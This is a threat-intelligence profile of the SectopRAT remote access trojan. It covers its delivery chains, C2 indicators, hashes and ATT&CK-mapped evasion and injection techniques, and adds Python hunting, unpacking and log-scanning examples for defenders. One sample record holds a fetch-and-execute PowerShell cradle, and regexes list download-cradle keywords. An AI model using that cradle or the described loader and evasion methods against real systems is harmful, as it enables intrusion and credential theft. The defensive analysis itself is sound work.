SectopRAT
SectopRAT is a .NET-based remote access trojan and information stealer, also tracked as Arechclient2. The reporting cited here places its activity from at least 2019. Observed capabilities include theft of browser credentials and cookies, browser session hijacking, collection of email client data, cryptocurrency wallet theft, harvesting of application credentials and installed-software inventories, language discovery, storage enumeration, process injection, privilege manipulation, PowerShell execution, and DLL sideloading for persistence. Microsoft reporting cited here also notes encrypted C2 traffic and the ability to create a hidden second desktop for stealthy operator activity.
Across the cited reporting, SectopRAT is commonly delivered as a secondary payload through multi-stage loader chains and social-engineering campaigns. Documented delivery vectors include ClickFix and fake-CAPTCHA lures, fake browser-update pages, SEO poisoning and malvertising, trojanized installers posing as Slack and Zoom, compromised WordPress sites, and loader ecosystems including ACRStealer, CastleLoader, ClearFake, HijackLoader/IDAT Loader, and NetSupport RAT-based intrusion chains. Several reports describe reflective or in-memory loading of the final SectopRAT payload: .NET assembly loading, AES-decrypted Donut shellcode, fiber-based shellcode execution, AMSI bypass, and direct NTDLL syscalls.
The malware is associated in the cited reporting with financially motivated cybercrime rather than a single exclusive actor. Reported overlaps or delivery relationships include GrayCharlie/SmartApeSG, CastleLoader activity attributed with medium-high confidence to GrayBravo, and infrastructure overlap with ACRStealer, AmateraStealer, NetSupport RAT, Vidar, and the ClickFix/FakeCAPTCHA ecosystems. CERT-UA reporting also lists SECTOPRAT among tooling used by UAC-0050. Targeting is broad and opportunistic, though victim sectors named in related campaigns include U.S. law firms, government agencies, critical infrastructure, IT firms, logistics companies, and Ukrainian organizations.
High-confidence indicators and infrastructure directly reported for SectopRAT include C2 servers 94.26.106.216:9000, 89.110.107.177, 144.31.90.139, 194.150.220.218, 85.158.110.179:15847, and 45.141.87.218, on ports including 15647 and 9000. Reported C2 paths are /wbinjget, which returned the string "Internal error!" as a heartbeat response, and /wmglb, which served an encrypted blob. Hashes and artifacts tied to SectopRAT delivery in the cited reporting:
DataUpdateClient.exe, SHA-256 f1c6397d57a8b1d0a931690e3703a13d95760a2b6a1623bdbfa71e25e886a64e
Donut shellcode, SHA-256 e7796671f9817ce4a90635589dfd2e21797d689aafa5cf5efe52072a058be67f
verification.google, SHA-256 03b4722296d5e7163bd58e2dddf38159e4eec34ab2a4a05225e8cd0119e297db
second-wave payload, SHA-256 0a62b065688ebbb636fb8f800881da22d6cb480bb458870909a39c0228c10c90
later sideloaded SectopRAT sample, SHA-256 59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78
Groups observed using it
4 distinct threat actors attributed by public researchers.
The PowerShell dropper ( bruce.php ) unpacks through five stages, including XOR decryption, reflective .NET assembly loading, AES-256-CBC decryption, and Donut shellcode injection via raw NTDLL syscalls, before deploying the final SectopRAT info-stealer targeting browser credentials, email clients, and cryptocurrency wallets.
Operators connect via C2, run system reconnaissance, and can drop SectopRAT as a secondary payload.
Techniques & procedures
35 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
Acquire Infrastructure: Domains (T1583.001): casyetnx[.]pw via CNOBIN, hosting via dataforest/VDSINA
Compromise Infrastructure: Server (T1584.004): compromised acecareer.edu WordPress for payload hosting
Initial Access
1 technique
ClearFake spreads by compromising legitimate websites and injecting hidden JavaScript into their pages. Victims do not need to do anything suspicious to get infected: simply visiting a tampered legitimate site can trigger the malware's multi-stage delivery chain.
Execution
5 techniques
Despite the .php extension, this is pure PowerShell... The actual payload mechanism is straightforward... After decryption, the result is a valid PE32 .NET assembly loaded directly into memory.
Stage 3 -- Legitimate Python Binary: The ZIP extracts to a directory containing FNPLicensingService.exe, which is actually a renamed, legitimately signed CPython 3.15 pythonw.exe... Stage 4 -- Obfuscated Python Loader: chrome_100_percent.pak ... is an ASCII text file containing obfuscated Python code.
After decryption, the loader allocates executable memory via NtAllocateVirtualMemory, writes the shellcode, and creates a new thread with NtCreateThreadEx. Both calls go directly to NTDLL, bypassing the Win32 API layer where most EDR products place their hooks.
Windows users were instructed to open the Run dialog and paste it, loading a remote DLL into memory with no file ever written to disk.
The user copies and pastes a PowerShell command into their own terminal, bypassing email security gateways, browser sandboxes, and most EDR behavioral triggers that watch for automated script execution.
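Both ClickFix snippets above describe the same host observable: the user pastes into the Run dialog or a console, so explorer.exe becomes the direct parent of a script host whose command line carries the download cradle. The snippet under Stealth adds a second lineage, 64-bit PowerShell relaunching itself from SysWOW64. The following is an added hunting example written for this page, not code from any cited report. It reads Sysmon Event ID 1 style fields (Image, ParentImage, CommandLine, ProcessId); the cradle keyword list and the sample records are constructed assumptions:

```python
"""Added example: check process-creation records for two SectopRAT delivery
lineages. Field names follow Sysmon Event ID 1; the keyword list and the
SAMPLE_EVENTS below are constructed for the illustration, not real telemetry."""
import re
from typing import Iterable

# Script hosts a pasted Run-dialog command typically lands in.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "rundll32.exe",
                "cmd.exe", "wscript.exe", "cscript.exe"}
# Markers of a remote-load cradle or encoded execution (assumed list; tune per environment).
CRADLE_RE = re.compile(
    r"(https?://|\bIEX\b|Invoke-Expression|DownloadString|DownloadFile|"
    r"\[System\.Reflection\.Assembly\]::Load|\s-(?:e|ec|enc|encodedcommand)\s)",
    re.IGNORECASE)
WOW64_PS_RE = re.compile(r"\\SysWOW64\\WindowsPowerShell\\v1\.0\\powershell\.exe$", re.IGNORECASE)

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify_event(ev: dict) -> list:
    """Names of the detections that fire on one process-creation record."""
    hits = []
    parent, image, cmd = _basename(ev["ParentImage"]), _basename(ev["Image"]), ev["CommandLine"]
    # ClickFix: a Win+R paste makes explorer.exe the direct parent of the script
    # host, and the pasted text itself carries the cradle.
    if parent == "explorer.exe" and image in SCRIPT_HOSTS and CRADLE_RE.search(cmd):
        hits.append("clickfix_run_dialog_cradle")
    # Architecture gate: a PowerShell that is not already under SysWOW64
    # spawning the 32-bit powershell.exe from SysWOW64.
    if (parent == "powershell.exe" and WOW64_PS_RE.search(ev["Image"])
            and "\\syswow64\\" not in ev["ParentImage"].lower()):
        hits.append("powershell_relaunch_32bit")
    return hits

def hunt(events: Iterable) -> dict:
    """Map each detection name to the ProcessIds it fired on."""
    findings = {}
    for ev in events:
        for name in classify_event(ev):
            findings.setdefault(name, []).append(ev["ProcessId"])
    return findings

SAMPLE_EVENTS = [  # constructed records: one ClickFix paste, one 32-bit relaunch, two benign
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://example.invalid/bruce.php)"'},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e SQBFAFgA'},
    {"ProcessId": 5001, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"ProcessId": 5002, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-Date"},
]

if __name__ == "__main__":
    print(hunt(SAMPLE_EVENTS))
```

The parent-process condition is what separates a ClickFix paste from routine scripted PowerShell: the same cradle launched by a scheduled task or a management agent has a different parent and does not fire. The SysWOW64 check deliberately excludes a parent that is itself 32-bit, since a 32-bit host spawning 32-bit PowerShell is normal.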
Persistence
1 technique
Privilege Escalation
3 techniques
DataUpdateClient.exe... Injects via NtAllocateVirtualMemory + NtCreateThreadEx... MITRE ATT&CK Mapping... T1055 Donut shellcode injection via NTDLL syscalls.
Rather than the standard CreateThread or NtCreateThreadEx injection techniques... the loader uses Windows Fibers: VirtualAlloc(RWX) ... ConvertThreadToFiber(0) ... CreateFiber(0, addr, 0) ... SwitchToFiber(fiber)
Stealth
10 techniques
Each stage exists to defeat a different class of defense... the XOR and AES layers defeat static analysis... MITRE ATT&CK Mapping... T1027 Three-layer encryption (XOR, AES-256-CBC, Chaskey).
Software Packing (T1027.002): reversed Base64 + zlib compression
Masquerading: Match Legitimate Name or Location (T1036.005): FNPLicensingService.exe (renamed pythonw.exe)
DataUpdateClient.exe... Injects via NtAllocateVirtualMemory + NtCreateThreadEx... MITRE ATT&CK Mapping... T1055 Donut shellcode injection via NTDLL syscalls.
Rather than the standard CreateThread or NtCreateThreadEx injection techniques... the loader uses Windows Fibers: VirtualAlloc(RWX) ... ConvertThreadToFiber(0) ... CreateFiber(0, addr, 0) ... SwitchToFiber(fiber)
The chrome_100_percent.pak file decodes through three distinct layers... reverse string, base64 decode, zlib decompress ... rolling XOR decrypts embedded SectopRAT PE
Architecture gate: Forces relaunch in 32-bit PowerShell via $env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe... MITRE ATT&CK Mapping... T1218 32-bit PowerShell relaunch via SysWOW64.
Four contracts served distinct roles: Smart Contract A delivered the anti-analysis dispatcher...
Victims on Windows and macOS were routed to separate payloads tailored to their operating system, with routing handled by real-time OS detection in the browser.
After decryption, the result is a valid PE32 .NET assembly loaded directly into memory via [System.Reflection.Assembly]::Load() -- entirely fileless.
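The layered decode described for chrome_100_percent.pak (reverse the text, Base64-decode, zlib-decompress, then a rolling XOR over the embedded PE) is reproduced here as an added example, not the loader's own code. The page does not give the XOR key schedule, so a repeating-key XOR is assumed as a stand-in; the block also adds the known-plaintext key recovery an analyst reaches for when the key is not known, using the DOS stub string every standard PE carries. pack() and build_fake_pe() exist only to build a constructed sample so the script runs offline:

```python
"""Added example: unpack a reverse/Base64/zlib/XOR-layered blob to a PE and
recover the XOR key from the DOS stub. The rolling XOR is modelled as a
repeating-key XOR (assumption); the sample blob and fake PE are constructed."""
import base64
import zlib

DOS_STUB = b"This program cannot be run in DOS mode."
STUB_OFFSET = 0x4E  # conventional offset of the stub text inside an MZ header

def rolling_xor(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so it both applies and removes the layer."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def strip_presentation_layers(blob: str) -> bytes:
    """Undo the outer three layers: reverse the text, Base64-decode, zlib-decompress."""
    return zlib.decompress(base64.b64decode(blob[::-1]))

def unpack(blob: str, key: bytes) -> bytes:
    """Full unpack; refuses output that does not start with an MZ header."""
    pe = rolling_xor(strip_presentation_layers(blob), key)
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header after decoding: wrong key or wrong layer order")
    return pe

def recover_xor_key(xored: bytes, key_len: int) -> bytes:
    """Known-plaintext recovery: the DOS stub sits at a fixed offset, so for
    each stub byte at position p, key[p mod key_len] = xored[p] ^ stub byte."""
    if key_len > len(DOS_STUB):
        raise ValueError("key longer than the known plaintext; need more known bytes")
    key = bytearray(key_len)
    for i, plain in enumerate(DOS_STUB):
        pos = STUB_OFFSET + i
        key[pos % key_len] = xored[pos] ^ plain
    return bytes(key)

def build_fake_pe() -> bytes:
    """Constructed stand-in for a PE (MZ magic, e_lfanew, DOS stub, PE signature);
    not a real binary and not loadable."""
    hdr = bytearray(0x80)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x80).to_bytes(4, "little")
    hdr[STUB_OFFSET:STUB_OFFSET + len(DOS_STUB)] = DOS_STUB
    return bytes(hdr) + b"PE\x00\x00" + bytes(range(256)) * 2

def pack(pe: bytes, key: bytes) -> str:
    """Inverse of unpack(); used only to build the constructed sample."""
    return base64.b64encode(zlib.compress(rolling_xor(pe, key)))[::-1].decode()

SAMPLE_KEY = b"\x5a\x13\x77"                     # constructed
SAMPLE_BLOB = pack(build_fake_pe(), SAMPLE_KEY)  # constructed

def demo() -> bytes:
    """Recover the key from the blob alone, then unpack with the recovered key."""
    xored = strip_presentation_layers(SAMPLE_BLOB)
    key = recover_xor_key(xored, len(SAMPLE_KEY))
    return unpack(SAMPLE_BLOB, key)

if __name__ == "__main__":
    print(demo()[:64])
```

Against a real sample the key length is the unknown: try each length up to the stub size and keep the one whose recovered key yields an MZ header and a plausible e_lfanew. If the loader's XOR turns out to be stateful (key derived from the previous byte) rather than repeating, the stub-based recovery still anchors the first bytes but the schedule has to be lifted from the Python loader itself.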
Credential Access
3 techniques
Victims saw a convincing fake Google reCAPTCHA overlay complete with an "I'm not a robot" checkbox. Clicking it triggered the ClickFix social engineering panel...
ACRStealer, a C++ infostealer that harvests passwords, credit card numbers, cookies, and cryptocurrency wallet data.
SectopRAT... Browser credential theft -- Chrome, Firefox, Edge profile data, saved passwords, cookies.
Discovery
4 techniques
Four contracts served distinct roles: Smart Contract A delivered the anti-analysis dispatcher...
Victims on Windows and macOS were routed to separate payloads tailored to their operating system, with routing handled by real-time OS detection in the browser.
SectopRAT... Software inventory -- enumeration of all installed applications.
SectopRAT... System reconnaissance -- language discovery, physical storage enumeration.
Collection
5 techniques
Stage 9: Data Theft: browser credential/cookie theft, cryptocurrency wallet theft, application credential harvesting
Victims saw a convincing fake Google reCAPTCHA overlay complete with an “I’m not a robot” checkbox. Clicking it triggered the ClickFix social engineering panel...
SectopRAT... Email client harvesting -- Outlook and Thunderbird data extraction.
Clicking it triggered the ClickFix social engineering panel, which simultaneously injected a malicious command directly into the victim’s clipboard.
SectopRAT, a .NET-based Remote Access Trojan capable of hijacking browser sessions
Command and Control
5 techniques
Threat actors used a technique called EtherHiding to store payload routing instructions inside blockchain smart contracts, bypassing all URL-based blocking methods entirely.
Stage 8: C2 Communication HTTP to 94[.]26[.]106[.]216:9000 /wbinjget -- heartbeat ... /wmglb -- payload/config download
Proxy: External Proxy (T1090.002): Cloudflare CDN as C2 proxy layer
When a victim visits a compromised site, injected code quietly queries the blockchain and retrieves the full payload into the browser with no external URL involved.
Non-Standard Port (T1571): port 9000
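The C2 evidence above gives a small set of atomic indicators (server IPs, ports 9000/15847/15647, the /wbinjget heartbeat and /wmglb payload path) plus one behaviour, a heartbeat that recurs on a timer. The following is an added example for this page, not a vendor rule: it scans proxy-style HTTP log lines for the indicators and then tests whether /wbinjget requests from a source arrive at a near-constant interval. The log format and the sample lines are constructed; the IPs and paths are the ones reported on this page:

```python
"""Added example: scan HTTP proxy log lines for the SectopRAT C2 indicators
listed on this page, then look for the /wbinjget heartbeat recurring at a
steady interval. The log format and SAMPLE_LOG are constructed."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

C2_IPS = {"94.26.106.216", "89.110.107.177", "144.31.90.139",
          "194.150.220.218", "85.158.110.179", "45.141.87.218"}
C2_PORTS = {9000, 15847, 15647}
C2_PATHS = {"/wbinjget": "heartbeat", "/wmglb": "payload_or_config"}

def parse_line(line: str) -> dict:
    """Constructed format: <iso-ts> <src> <dst:port> <method> <path> <status> <bytes>."""
    ts, src, dst, method, path, status, size = line.split()
    ip, port = dst.rsplit(":", 1)
    return {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")), "src": src,
            "dst": ip, "port": int(port), "method": method, "path": path,
            "status": int(status), "bytes": int(size)}

def match_ioc(rec: dict) -> list:
    """Atomic indicator matches for one request; a bare port hit on its own is weak."""
    hits = []
    if rec["dst"] in C2_IPS:
        hits.append("known_c2_ip")
    if rec["port"] in C2_PORTS:
        hits.append("c2_port")
    if rec["path"] in C2_PATHS:
        hits.append("c2_path_" + C2_PATHS[rec["path"]])
    return hits

def beacon_sources(records, path="/wbinjget", min_hits=4, max_jitter=0.2) -> list:
    """Source IPs whose requests to `path` recur at a near-constant interval
    (coefficient of variation of the inter-request gaps <= max_jitter)."""
    by_src = defaultdict(list)
    for r in records:
        if r["path"] == path:
            by_src[r["src"]].append(r["ts"])
    beaconing = []
    for src, times in by_src.items():
        times.sort()
        if len(times) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_jitter:
            beaconing.append(src)
    return sorted(beaconing)

def scan(lines) -> dict:
    """Indicator hits keyed by line index, plus the sources that look like beacons."""
    records = [parse_line(l) for l in lines if l.strip()]
    ioc_hits = {}
    for i, rec in enumerate(records):
        hits = match_ioc(rec)
        if hits:
            ioc_hits[i] = hits
    return {"ioc_hits": ioc_hits, "beaconing": beacon_sources(records)}

SAMPLE_LOG = [  # constructed; the four /wbinjget lines are 60 s apart
    "2025-01-01T10:00:00Z 10.0.0.5 94.26.106.216:9000 GET /wbinjget 200 15",
    "2025-01-01T10:01:00Z 10.0.0.5 94.26.106.216:9000 GET /wbinjget 200 15",
    "2025-01-01T10:02:00Z 10.0.0.5 94.26.106.216:9000 GET /wbinjget 200 15",
    "2025-01-01T10:03:00Z 10.0.0.5 94.26.106.216:9000 GET /wbinjget 200 15",
    "2025-01-01T10:03:30Z 10.0.0.5 94.26.106.216:9000 GET /wmglb 200 40960",
    "2025-01-01T10:03:31Z 10.0.0.7 203.0.113.20:443 GET /index.html 200 5120",
    "2025-01-01T10:04:00Z 10.0.0.8 203.0.113.9:9000 POST /api/ingest 201 300",
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A hit on a listed IP or on the /wbinjget or /wmglb path is strong by itself; a port-only hit (the last sample line) needs the beacon or path evidence before escalation, since 9000 is a common application port. If the proxy records response size, the roughly 15-byte body of the documented "Internal error!" heartbeat reply is one more field to corroborate on. Known C2 IPs rotate, so the path and timing logic is what keeps the rule useful after the listed addresses go stale.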
Exfiltration
1 technique
Exfiltration Over C2 Channel (T1041): HTTP exfiltration
Other
1 technique
IOCs tracked for this family
102 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
33 sources tracked across advisories, community write-ups, and news.
A .NET-based remote access trojan used in the ClearFake campaign to hijack browser sessions and support post-compromise access on victim systems.
A remote access trojan with stealer capabilities delivered in a similar fake Slack download campaign.
A RAT delivered as a secondary payload by CastleLoader.
Remote access trojan family with infrastructure present on the same malicious network.